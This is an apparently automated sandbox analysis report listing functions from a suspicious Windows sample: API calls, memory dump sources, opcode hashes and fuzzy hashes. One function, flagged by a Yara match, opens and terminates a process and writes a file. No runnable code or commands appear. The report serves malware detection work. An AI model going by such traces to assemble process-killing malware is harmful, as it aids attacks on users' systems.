                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                    • String ID:
                                    • API String ID: 670545878-0
                                    • Opcode ID: 6f7952b9cdcb73e72994df93ba2655a9d367f2f2a1107226bf3fa9820b2e84f9
                                    • Instruction ID: 1a1ea72aaa3a6765ea0ec3a65c28e3ee92f17fedf9c917ca18c55a438640cf10
                                    • Opcode Fuzzy Hash: 6f7952b9cdcb73e72994df93ba2655a9d367f2f2a1107226bf3fa9820b2e84f9
                                    • Instruction Fuzzy Hash: 2311063AA013215786B05E6A5E68F6BB29C9FF4B51F0C012EEE90D3301DF28DC4142AD
                                    Function 0041D630 Relevance: 9.1, APIs: 6, Instructions: 54windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageA.USER32(?,0000110A,00000002,?), ref: 0041D64B
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D65D
                                    • SendMessageA.USER32(?,0000110A,00000002,?), ref: 0041D66B
                                    • SendMessageA.USER32(?,0000110A,00000001,?), ref: 0041D67D
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D68F
                                    • SendMessageA.USER32(?,0000110A,00000001,?), ref: 0041D69D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: e476edcf7dddb7de31a204316d0147fd6231fe6b1a871442e555a649ade3ba09
                                    • Instruction ID: 3ef9cdafcfc7f0247344fc9dd625f878905ba069611ff15d6de485fc42b6ec75
                                    • Opcode Fuzzy Hash: e476edcf7dddb7de31a204316d0147fd6231fe6b1a871442e555a649ade3ba09
                                    • Instruction Fuzzy Hash: 450186F2B403057EF534DA658CC2FE3A2AD9F98B91F018619B701DB2C0C5E5EC824634
                                    Function 004C3ACC Relevance: 9.0, APIs: 6, Instructions: 48windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFocus.USER32 ref: 004C3ACF
                                      • Part of subcall function 004C3971: GetWindowLongA.USER32(00000000,000000F0), ref: 004C3982
                                    • GetParent.USER32(00000000), ref: 004C3AF6
                                      • Part of subcall function 004C3971: GetClassNameA.USER32(00000000,?,0000000A), ref: 004C399D
                                      • Part of subcall function 004C3971: lstrcmpiA.KERNEL32(?,combobox), ref: 004C39AC
                                    • GetWindowLongA.USER32(?,000000F0), ref: 004C3B11
                                    • GetParent.USER32(?), ref: 004C3B1F
                                    • GetDesktopWindow.USER32 ref: 004C3B23
                                    • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 004C3B37
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                    • String ID:
                                    • API String ID: 2818563221-0
                                    • Opcode ID: 78e94f2489b24a7183e4f805ee6a82eb8d5b29c62380fa0f64fd1563b640795d
                                    • Instruction ID: 51668d5e6b31f87acd6333edb2282dbc034028a1c5405d93364f37ada7f221c2
                                    • Opcode Fuzzy Hash: 78e94f2489b24a7183e4f805ee6a82eb8d5b29c62380fa0f64fd1563b640795d
                                    • Instruction Fuzzy Hash: C7F0F43D60023133D2E22B285C88F6F61585F81B56F14823EF911A33D1FF28AE0280AD
                                    Function 02424F99 Relevance: 9.0, APIs: 6, Instructions: 47fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(024A4034,40000000,00000000,00000000,00000003,00000000,00000000,?,02425353), ref: 02424FBB
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 02424FD5
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 02424FEA
                                    • CloseHandle.KERNEL32(00000000), ref: 02424FF4
                                    • WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 0242500C
                                    • CloseHandle.KERNEL32(000000FF), ref: 02425016
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                    • String ID:
                                    • API String ID: 2603052737-0
                                    • Opcode ID: cd95e1a2ba38657e92e61d4d1b57dfbc17ecf7d85d3047b444268a2b68b44b7f
                                    • Instruction ID: 07f9757848fd2880e57341dda07b5bbe3fc4f17dc2f75e5d1277d63c29417f60
                                    • Opcode Fuzzy Hash: cd95e1a2ba38657e92e61d4d1b57dfbc17ecf7d85d3047b444268a2b68b44b7f
                                    • Instruction Fuzzy Hash: EA01DBB5E80308FBDB18DBA4EC4AF9E7B78AB48701F508644F616A62C0D7B46654CF54
                                    Function 0041E590 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 226windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 0041E68C
                                    • DestroyCursor.USER32(?), ref: 0041E72C
                                    • SendMessageA.USER32(?,000000F7,00000000,?), ref: 0041E7EB
                                    • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0041E806
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateCursorDestroySolid
                                    • String ID: BUTTON
                                    • API String ID: 2198832287-3405671355
                                    • Opcode ID: 4b500c961903431ab952ebba7df95e4599d5e9c578a6704eae1ec08e20a5d207
                                    • Instruction ID: 6893abc22feee638899888de0d07626f40cdfb7c6e7c525cb3e128e4ad7c5235
                                    • Opcode Fuzzy Hash: 4b500c961903431ab952ebba7df95e4599d5e9c578a6704eae1ec08e20a5d207
                                    • Instruction Fuzzy Hash: DF71A4B96007049FD724DF66C880FABB7E5BB94704F54492EF99683380D739E881CB5A
                                    Function 0041F8B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 226windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 0041F9AC
                                    • DestroyCursor.USER32(?), ref: 0041FA4C
                                    • SendMessageA.USER32(?,000000F7,00000000,?), ref: 0041FB0B
                                    • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0041FB26
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateCursorDestroySolid
                                    • String ID: BUTTON
                                    • API String ID: 2198832287-3405671355
                                    • Opcode ID: 2144e6dded6e0e2210e1147e4f5dffb1658b73849d88bd5ab53fb238cab8a0f2
                                    • Instruction ID: f107a27cf5fb1156ee72db6923a4c32adc2468c2e9ff760063656ccbf7415752
                                    • Opcode Fuzzy Hash: 2144e6dded6e0e2210e1147e4f5dffb1658b73849d88bd5ab53fb238cab8a0f2
                                    • Instruction Fuzzy Hash: 4271A3B5604705AFD724DF65C880FABB7E5BB84710F10492EF58683380D779B88ACB5A
                                    Function 0041B790 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(0000000F), ref: 0041B89C
                                    • DestroyCursor.USER32(?), ref: 0041B8FA
                                    • SendMessageA.USER32(?,000000F7,00000001,?), ref: 0041B99C
                                    • SendMessageA.USER32(?,000000F7,00000000,?), ref: 0041B9CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$ColorCursorDestroy
                                    • String ID: BUTTON
                                    • API String ID: 3592366650-3405671355
                                    • Opcode ID: 94c0b98c63bbe1cfb6494bb9270f49ec5de9ab37da9ec8b89c0a3cf4e0c45ce5
                                    • Instruction ID: aa03a3313d5ffff0717839192e824df6e90c60f9e3b256a32b7e702f7132dccc
                                    • Opcode Fuzzy Hash: 94c0b98c63bbe1cfb6494bb9270f49ec5de9ab37da9ec8b89c0a3cf4e0c45ce5
                                    • Instruction Fuzzy Hash: EA6182B56047049FD224EF55C880BABF7E9FB44B10F10891EF59683790DB39E885CB9A
                                    Function 00427C30 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 172COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0042B630: GetCurrentThreadId.KERNEL32 ref: 0042B655
                                      • Part of subcall function 0042B630: IsWindow.USER32(00010444), ref: 0042B671
                                      • Part of subcall function 0042B630: SendMessageA.USER32(00010444,000083E7,?,00000000), ref: 0042B68A
                                      • Part of subcall function 0042B630: ExitProcess.KERNEL32 ref: 0042B69F
                                    • RtlDeleteCriticalSection.NTDLL(005DFE00), ref: 00427C6A
                                      • Part of subcall function 004BE544: __EH_prolog.LIBCMT ref: 004BE549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalCurrentDeleteExitH_prologMessageProcessSectionSendThreadWindow
                                    • String ID: !$#$WdL$jB
                                    • API String ID: 2888814780-1538548938
                                    • Opcode ID: 299b0fdfd5623d895e8ee76ff17395e17f803b77690c47a8899be60f5375e144
                                    • Instruction ID: d6e3c3fb4069586939093f5b01e5eac804de8e77cb082d91d81567cc6e3cc454
                                    • Opcode Fuzzy Hash: 299b0fdfd5623d895e8ee76ff17395e17f803b77690c47a8899be60f5375e144
                                    • Instruction Fuzzy Hash: 5F917D34208782CAD312EF75C4947DABFE4AFA1348F50084EE4D647393DBB96249C7A6
                                    Function 0041DE50 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 169windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0041DE96
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041DF1D
                                    • GetCurrentObject.GDI32(?,00000006), ref: 0041DFAA
                                    • GetClientRect.USER32(?,?), ref: 0041E01C
                                      • Part of subcall function 004C3056: __EH_prolog.LIBCMT ref: 004C305B
                                      • Part of subcall function 004C3056: EndPaint.USER32(?,?,?,?,004175C3), ref: 004C3078
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologPaintRect$BeginClientClipCurrentEmptyObject
                                    • String ID: pTL
                                    • API String ID: 3717962522-168633513
                                    • Opcode ID: a05eefc11915307674640b95a2a8d9a7c5f97d4c3480cc7c7f3c245b974f52c1
                                    • Instruction ID: ae51d9fdcfd9cf1725e4188548f8c8f5f07b4c6801f3d861a7a82658f4dbd2bc
                                    • Opcode Fuzzy Hash: a05eefc11915307674640b95a2a8d9a7c5f97d4c3480cc7c7f3c245b974f52c1
                                    • Instruction Fuzzy Hash: 97619E755083419FC364DF25C985FABB7E8EF98714F00491EF18A83281DB78EA49CB66
                                    Function 00422DF0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateBrushIndirect.GDI32(?), ref: 00422E32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BrushCreateIndirect
                                    • String ID: pTL
                                    • API String ID: 2533917330-168633513
                                    • Opcode ID: 18b1af659a6dc8316a193d6446cd6d5aba15009206258a1c95ff726a6caf6b90
                                    • Instruction ID: 708f0049300108b1798ae6da1445bbdcf48b8005ce75c03b6ad2f3b35a6bd0c0
                                    • Opcode Fuzzy Hash: 18b1af659a6dc8316a193d6446cd6d5aba15009206258a1c95ff726a6caf6b90
                                    • Instruction Fuzzy Hash: C041E1B4A04211ABDB28CF24D985B6AB7E4F788714F408D2EF446C3390CB7CD945CB16
                                    Function 00438030 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
